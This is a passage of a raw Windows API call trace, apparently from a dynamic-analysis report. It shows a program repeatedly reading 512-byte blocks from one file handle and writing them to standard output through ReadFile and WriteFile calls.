_get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.259] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, 
lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, 
lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.260] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.262] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, 
lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: 
lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.263] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] 
GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 
[0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.265] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.266] GetFileType (hFile=0x50) returned 0x1 [0132.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.266] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, 
